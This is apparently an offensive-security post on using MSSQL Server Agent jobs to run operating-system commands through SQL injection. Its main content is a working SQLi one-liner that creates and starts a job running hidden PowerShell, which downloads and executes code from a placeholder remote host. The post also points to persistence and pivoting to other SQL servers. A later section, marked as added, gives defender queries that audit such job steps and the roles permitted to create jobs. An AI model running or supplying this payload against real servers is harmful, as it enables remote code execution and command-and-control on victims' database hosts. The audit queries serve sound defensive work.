MSSQL Server Agent Jobs for Command Execution



A companion video to a recent blog post I wrote. Use native MSSQL Server functionality to achieve command execution via a SQL query, in lieu of using xp_cmdshell. Can also be used to schedule persistent command execution, and abused to access other SQL servers (if the account running MSSQL Server Agent has access to them, or if you have ascertained credentials already).

In the video I use an example of a SQL injection condition that also abuses this method to achieve a remote command and control session on a target system.

Here is the SQL syntax for creating and running a job, as a one-liner for SQLi delivery:
USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5; EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';
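As an added defender-side example (not from the original post or the video), the following T-SQL lists Agent job steps of the kind the one-liner above creates, with owner and last run, and then lists the msdb principals entitled to create such jobs; it assumes a login with read access to msdb.

```sql
-- Added audit query (not from the original post): enumerate SQL Agent job steps
-- that run OS commands through the CmdExec or PowerShell subsystems, or whose
-- command text matches the pattern used in the one-liner above.
USE msdb;
SELECT  j.name                   AS job_name,
        j.enabled,
        j.date_created,
        SUSER_SNAME(j.owner_sid) AS job_owner,
        s.step_id,
        s.step_name,
        s.subsystem,
        s.command,
        last_run.run_date,
        last_run.run_status
FROM    dbo.sysjobs      AS j
JOIN    dbo.sysjobsteps  AS s ON s.job_id = j.job_id
OUTER APPLY (
        -- most recent history row for this step, if it has ever run
        SELECT TOP (1) h.run_date, h.run_status
        FROM   dbo.sysjobhistory AS h
        WHERE  h.job_id = j.job_id AND h.step_id = s.step_id
        ORDER BY h.instance_id DESC
) AS last_run
WHERE   s.subsystem IN (N'CmdExec', N'PowerShell')
   OR   s.command LIKE N'%xp_cmdshell%'
   OR   s.command LIKE N'%downloadstring%'
ORDER BY j.date_created DESC;

-- Who can create jobs at all: sp_add_job requires sysadmin or membership of one
-- of the msdb SQLAgent* roles, so this list is the set of principals that the
-- technique above is available to, and the place to prune excess grants.
SELECT  r.name AS agent_role, m.name AS member, m.type_desc
FROM    sys.database_role_members AS rm
JOIN    sys.database_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.database_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE   r.name IN (N'SQLAgentUserRole', N'SQLAgentReaderRole', N'SQLAgentOperatorRole')
ORDER BY r.name, m.name;
```

Schedule the first query on a known-good instance to baseline legitimate CmdExec/PowerShell steps, so that a newly created job with a throwaway name and a download cradle stands out.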